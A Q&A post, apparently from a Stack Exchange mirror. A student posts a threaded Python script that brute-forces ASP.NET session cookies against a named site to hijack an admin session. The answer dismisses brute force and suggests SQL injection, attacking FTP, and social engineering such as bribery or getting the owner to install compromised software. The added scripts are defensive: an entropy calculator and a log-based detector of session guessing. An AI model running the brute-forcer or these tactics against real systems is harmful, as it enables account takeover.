Question

I am a newbie here. I am studying pentesting for my college project and want to develop a future in the same. I have a site hosted by my friend (under mutual consent); he has challenged me to hack into it. It is a simple site in ASP.NET, probably 2.0. It uses a form to log into the site. In my understanding he is generating ASP.NET_SessionId to store authentication. I tried to sign out from the site but the cookie did not expire. Now I want to try and log into the admin account using the same method. I am not aware as to where he is logging in from as the admin. I wrote this brute-force Python script to do the same, with 50 threads, as if I spawn more than 50 then the sessions start to get timed out.

#!/usr/bin/python
import urllib2
import string
import itertools
import threading

threadLimiter = threading.BoundedSemaphore(50)

class checkPage(threading.Thread):
    def __init__(self,sessionID):
        threading.Thread.__init__(self)
        self.sessionID=sessionID
    def run(self):
        threadLimiter.acquire()
        try:
             opener = urllib2.build_opener()
             opener.addheaders.append(('Cookie', 'ASP.NET_SessionId='+self.sessionID))
             f = opener.open("http://mysite.webber.org/default.aspx")
             page = f.read()
             f.close()
             #if logged in write to file
             if 'Welcome' in page:
                 k = open("session.txt","a")
                 k.write(self.sessionID+'\n')
                 k.close()
        finally:
            threadLimiter.release()

count = 0
for state in itertools.product('abcdefghijklmnopqrstuvwxyz012345', repeat=24):
     sessionID = ''.join(state)
     try:
         thread=checkPage(sessionID)
         thread.start()
     except:
         print "thread cannot be started"
         break
     if count==50:
         thread.join()
         count = 0
     count += 1

As per ASP.NET, the session ID is generated by the CreateSessionId function and gives an output of 24 bytes with a-z and 0-5.

I intend to steal the admin session ID and then use it again to log into the page and gain admin access.

Is it a correct approach?

I figure this brute force will probably take forever. What is my best option to reduce the brute-force time?

Thank you.
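As an added example, not part of the original question, the following Python 3 script quantifies the format the post describes (24 symbols from a-z and 0-5) the way a defender assessing session-ID strength would: entropy in bits, and the expected number of random guesses, and years, before a guess lands on one of the sessions that happen to be valid at that moment. The uniform per-symbol distribution, the 100 live sessions and the 1000 guesses per second are assumptions of this example.

```python
import math

# The question's description of ASP.NET session ids: 24 symbols drawn from a-z and 0-5.
# The alphabet and length are from the post; uniform symbol choice is this example's assumption.
ASPNET_ALPHABET = "abcdefghijklmnopqrstuvwxyz012345"
ASPNET_ID_LENGTH = 24

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def session_id_entropy_bits(alphabet_size, length):
    """Entropy in bits of an id of `length` symbols chosen uniformly from `alphabet_size`."""
    return length * math.log2(alphabet_size)


def expected_guesses_to_hit_live_session(alphabet_size, length, live_sessions):
    """Expected number of uniformly random guesses before one matches any of
    `live_sessions` ids that are valid at that moment.  Each guess succeeds with
    probability live_sessions / keyspace, so the expectation is keyspace / live_sessions."""
    if live_sessions < 1:
        raise ValueError("need at least one live session to have anything to hit")
    return alphabet_size ** length // live_sessions


def expected_years_to_hit(alphabet_size, length, live_sessions, guesses_per_second):
    """Wall-clock years the expected number of guesses takes at a given request rate."""
    guesses = expected_guesses_to_hit_live_session(alphabet_size, length, live_sessions)
    return guesses / guesses_per_second / SECONDS_PER_YEAR


def looks_like_aspnet_session_id(value):
    """Sanity-check an observed id against the format the question describes.  A value
    that fails this (wrong length, other characters) is not what the post assumes."""
    return len(value) == ASPNET_ID_LENGTH and all(c in ASPNET_ALPHABET for c in value)


if __name__ == "__main__":
    bits = session_id_entropy_bits(len(ASPNET_ALPHABET), ASPNET_ID_LENGTH)
    print(f"session id entropy: {bits:.0f} bits")
    # Constructed scenario: 100 sessions alive at once, 1000 guesses per second.
    years = expected_years_to_hit(len(ASPNET_ALPHABET), ASPNET_ID_LENGTH, 100, 1000)
    print(f"expected time to land on a live session: {years:.3g} years")
```

The 120-bit result is well above the 64 bits commonly recommended as a minimum for session identifiers, which is the quantitative reason the answer below gives for not pursuing this route; the same functions can be pointed at any other id format to check an application you are defending.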


Solution

Brute forcing sucks.

No, really, it sucks lemons.

The whole idea behind security is not to keep people out but to keep people out long enough that they get bored, or you spot them breaking in. Also, session cookies are something that is generated server side and then given to the client, so the odds of you brute forcing one of these cookies that is in use at that given moment are unlikely, to say the least.

It might be a good idea to consider the alternatives.

  1. Target the box itself

    This is a viable alternative: rather than targeting your effort at the website to try and find a vulnerability there, it might save you time and effort to go after an insecure box directly. Perhaps exploiting insecure password policies, or attacking more insecure services like FTP, would yield better results.

  2. SQL

    Oh SQL, where do I start. Most of the world seems to be running you these days, and a large majority of websites still don't sanitise input correctly. It might be the case that you can do SQL injection on the username box; no hard work is needed, you can either violate the SQL server, or just get dumps of the database, or even insert records into the database when you figure out the schema.

  3. Social Engineering

    Never ignore this aspect of security: humans have a price, and you can buy anyone for the right amount. For this reason you could always pay him for admin access, pay him to set the password to something you know, or trick him into revealing his password directly. Or get him to install compromised software on the box.

There are so many other possible attack vectors that this list could go on for a while, hence why I will keep it short and to the point. These should give you some ideas that, when doing a pen test or an audit, it's a good idea to keep an open mind about your target. Just remember the golden rule.

Keep things simple. Stupid.
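The answer's second line of defence is spotting the attempt. As an added example that is not from the original answer, the following Python 3 script runs over constructed IIS W3C log lines (with the optional cs(Cookie) field enabled) and flags a client address that presents many distinct ASP.NET_SessionId values within a short window; a legitimate browser keeps one cookie for the life of its session, so a burst of different ids from one address is the signature of guessing. The sample lines, addresses, 60-second window and threshold of three are assumptions of the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C-style log excerpt (not from the original page).  The #Fields header
# gives the column order; cs(Cookie) is only present when that field is enabled in IIS.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(Cookie)
2024-01-01 10:00:00 203.0.113.7 GET /default.aspx 200 ASP.NET_SessionId=abcdefghijklmnopqrstuvw0
2024-01-01 10:00:00 203.0.113.7 GET /default.aspx 200 ASP.NET_SessionId=abcdefghijklmnopqrstuvw1
2024-01-01 10:00:01 203.0.113.7 GET /default.aspx 200 ASP.NET_SessionId=abcdefghijklmnopqrstuvw2
2024-01-01 10:00:01 203.0.113.7 GET /default.aspx 200 ASP.NET_SessionId=abcdefghijklmnopqrstuvw3
2024-01-01 10:00:05 198.51.100.2 GET /default.aspx 200 ASP.NET_SessionId=zyxwvutsrqponmlkjihgfed5
2024-01-01 10:00:09 198.51.100.2 GET /account.aspx 200 ASP.NET_SessionId=zyxwvutsrqponmlkjihgfed5
2024-01-01 10:02:30 203.0.113.7 GET /default.aspx 200 ASP.NET_SessionId=abcdefghijklmnopqrstuvw4
"""

# 24 symbols from a-z and 0-5, the id format the question describes.
SESSION_ID_RE = re.compile(r"ASP\.NET_SessionId=([a-z0-5]{24})")


def parse_iis_log(text):
    """Turn W3C log lines into dicts; directive lines (#Software, #Fields, ...) are skipped.
    Only the fields this detector needs are kept."""
    events = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue  # malformed or truncated line: ignore rather than crash
        date, time, ip, _method, _uri, _status, cookie = parts
        m = SESSION_ID_RE.search(cookie)
        events.append({
            "time": datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S"),
            "ip": ip,
            "session_id": m.group(1) if m else None,
        })
    return events


def find_session_guessing(events, window=timedelta(seconds=60), threshold=3):
    """Return {client_ip: peak_distinct_ids} for clients that presented at least
    `threshold` different session ids within any sliding interval of length `window`."""
    by_ip = defaultdict(list)
    for e in events:
        if e["session_id"] is not None:
            by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        start, peak = 0, 0
        for end in range(len(evs)):
            # shrink the window from the left until it spans at most `window`
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            distinct = len({e["session_id"] for e in evs[start:end + 1]})
            peak = max(peak, distinct)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


if __name__ == "__main__":
    for ip, n in find_session_guessing(parse_iis_log(SAMPLE_LOG)).items():
        print(f"ALERT {ip}: {n} distinct ASP.NET_SessionId values within 60s")
```

On the sample, 203.0.113.7 is flagged with four distinct ids inside one minute while 198.51.100.2, which reuses a single cookie across two pages, is not. In production the same rule belongs in whatever consumes the web server logs or, better, in the application itself, where requests carrying a session id the server never issued can be counted directly.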

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow